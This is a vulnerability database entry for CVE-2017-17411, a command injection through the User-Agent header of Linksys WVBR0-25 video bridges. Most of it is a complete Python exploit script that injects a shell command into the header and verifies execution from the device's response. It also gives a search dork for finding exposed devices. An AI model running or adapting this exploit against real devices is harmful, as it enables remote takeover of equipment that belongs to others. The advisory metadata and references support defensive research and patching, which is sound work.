ID

VAR-E-201712-0127


CVE

cve_id:CVE-2017-17411

Trust: 1.8

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363

EDB ID

43363


TITLE

Linksys WVBR0 - 'User-Agent' Remote Command Injection - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 43363

DESCRIPTION

Linksys WVBR0 - 'User-Agent' Remote Command Injection. CVE-2017-17411. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 43363

AFFECTED PRODUCTS

vendor: linksys, model: wvbr0, scope: -, version: -

Trust: 1.6

vendor: linksys, model: wvbr0-25 user-agent, scope: -, version: -

Trust: 0.5

vendor: linksys, model: wvbr0, scope: eq, version: 25

Trust: 0.3

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363 // EDBNET: 95390

EXPLOIT

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection

"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>

$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""

import logging

import requests

# Logger used by send_http_request() to report failed requests.
log = logging.getLogger(__name__)


def check(url):
    payload = '"; echo "admin'
    md5hash = "456b7016a916a4b178dd72b947c152b7"  # echo "admin" | md5sum

    resp = send_http_request(url, payload)

    if not resp:
        return False

    # Only the lines that echo the device's sys_cmd setting are of interest.
    lines = resp.text.splitlines()
    sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)

    if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
        return False

    if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
        return False

    print("[+] Target is exploitable by CVE-2017-17411 ")
    return True


def send_http_request(url, payload):
    # The payload is carried in the User-Agent request header.
    headers = {
        'User-Agent': payload
    }

    response = None
    try:
        response = requests.get(url, headers=headers)
    except Exception as err:
        log.exception(err)

    return response


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 2:
        print("[*] Usage: python %s <URL>" % sys.argv[0])
        sys.exit(0)

    check(sys.argv[1])

# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"

## References

# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

Trust: 1.0

sources: EXPLOIT-DB: 43363

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 43363

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 43363

TYPE

'User-Agent' Remote Command Injection

Trust: 1.6

sources: EXPLOIT-DB: 43363 // EDBNET: 95390

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

sources: PACKETSTORM: 145640

CREDITS

nixawk

Trust: 0.6

sources: EXPLOIT-DB: 43363

EXTERNAL IDS

db: NVD, id: CVE-2017-17411

Trust: 1.8

db: EXPLOIT-DB, id: 43363

Trust: 1.6

db: EDBNET, id: 95390

Trust: 0.6

db: PACKETSTORM, id: 145640

Trust: 0.5

db: ZDI, id: ZDI-17-973

Trust: 0.3

db: BID, id: 102212

Trust: 0.3

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363 // EDBNET: 95390

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-17411

Trust: 1.5

url:https://github.com/nixawk/labs/blob/5777612e4a7d06f4e1811ca654bcb22c050078bf/cve-2017-17411/exploit-cve-2017-17411.py

Trust: 1.0

url:https://www.exploit-db.com/exploits/43363/

Trust: 0.6

url:http://www.zerodayinitiative.com/advisories/zdi-17-973/

Trust: 0.3

url:https://www.linksys.com

Trust: 0.3

url:https://github.com/nixawk/labs/blob/master/cve-2017-17411/exploit-cve-2017-17411.py

Trust: 0.3

url:https://github.com/rapid7/metasploit-framework/issues/9304

Trust: 0.3

sources: BID: 102212 // PACKETSTORM: 145640 // EXPLOIT-DB: 43363 // EDBNET: 95390

SOURCES

db: BID, id: 102212
db: PACKETSTORM, id: 145640
db: EXPLOIT-DB, id: 43363
db: EDBNET, id: 95390

LAST UPDATE DATE

2022-07-27T09:58:23.576000+00:00


SOURCES UPDATE DATE

db: BID, id: 102212, date: 2017-12-19T21:01:00

SOURCES RELEASE DATE

db: BID, id: 102212, date: 2017-12-18T00:00:00
db: PACKETSTORM, id: 145640, date: 2018-01-04T01:01:48
db: EXPLOIT-DB, id: 43363, date: 2017-12-14T00:00:00
db: EDBNET, id: 95390, date: 2017-12-18T00:00:00